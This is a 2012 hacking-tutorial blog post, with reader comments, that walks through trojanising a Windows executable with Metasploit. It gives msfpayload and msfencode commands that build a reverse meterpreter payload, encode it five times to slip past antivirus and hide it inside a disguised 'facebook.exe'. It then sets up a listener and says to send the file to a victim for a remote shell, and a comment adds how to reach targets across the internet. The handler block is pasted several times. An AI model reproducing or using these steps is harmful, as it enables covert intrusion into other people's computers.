August 09, 2012

Create EXE Backdoor Using Metasploit

Embedding backdoor into EXE files is an important step in order to learn how to hack any windows system (xp, vista or seven) and the good thing is that easy .. you can follow the video tutorial.




Requirement

1. Metasploit framework 4/3/2
2. Linux OS ( it is recommended to use backtrack that already include metasploit framework inside the oprating system)

Lets start

1. First at all you should prepare your target EXE file. in this case i will use facebook.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 x > facebook.com

In case if the victim uses anti-virus you must encode the backdoor 5 times, like this

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/facebook.exe -o /root/Desktop/facebook2.exe

2. Because we selected reverse meterpreter payload, we need to setup the exploit handler to handle the connection back to our attacking machine. In this case attacker use IP address 192.168.8.92. Go to Metasploit console by typing msfconsole, and then run

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp 
msf exploit(handler) > set LHOST 192.168.8.92 LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443 LPORT => 443 msf
exploit(handler) > exploit

3. The next step we can send our special FACEBOOK.EXE files to victim, as soon as they download and open it, there's meterpreter shell on victim computer


sf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.8.92 LHOST => 192.168.8.92 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit

Read more : http://vishnuvalentino.com/hacking-tutorial/create-exe-backdoor-using-metasploit-and-backtrack-5-in-4-simple-steps/
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.8.92 LHOST => 192.168.8.92 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit

Read more : http://vishnuvalentino.com/hacking-tutorial/create-exe-backdoor-using-metasploit-and-backtrack-5-in-4-simple-steps/
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.8.92 LHOST => 192.168.8.92 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit

Read more : http://vishnuvalentino.com/hacking-tutorial/create-exe-backdoor-using-metasploit-and-backtrack-5-in-4-simple-steps/

7 comments:

  1. Anonymous12/3/13 23:51

    برافو اشرف
    شرح جيد
    الان جاري مشاهدة الفيديو
    ميرسي
    :)

    ReplyDelete
    Replies
    1. Anonymous1/8/13 21:37

      No you can not blow up this video

      Delete
  2. this is available only in lan ?

    ReplyDelete
  3. Anonymous6/12/14 08:45

    No, you can direct to WAN but you will need an IP address which is not behind NAT. DMZ mode could work.

    ReplyDelete
  4. nic.............. sir

    ReplyDelete
    Replies
    1. nic.......... sir23/12/14 20:27

      Yes, very nic.......... sir

      Delete
  5. sir how to find suitable port

    ReplyDelete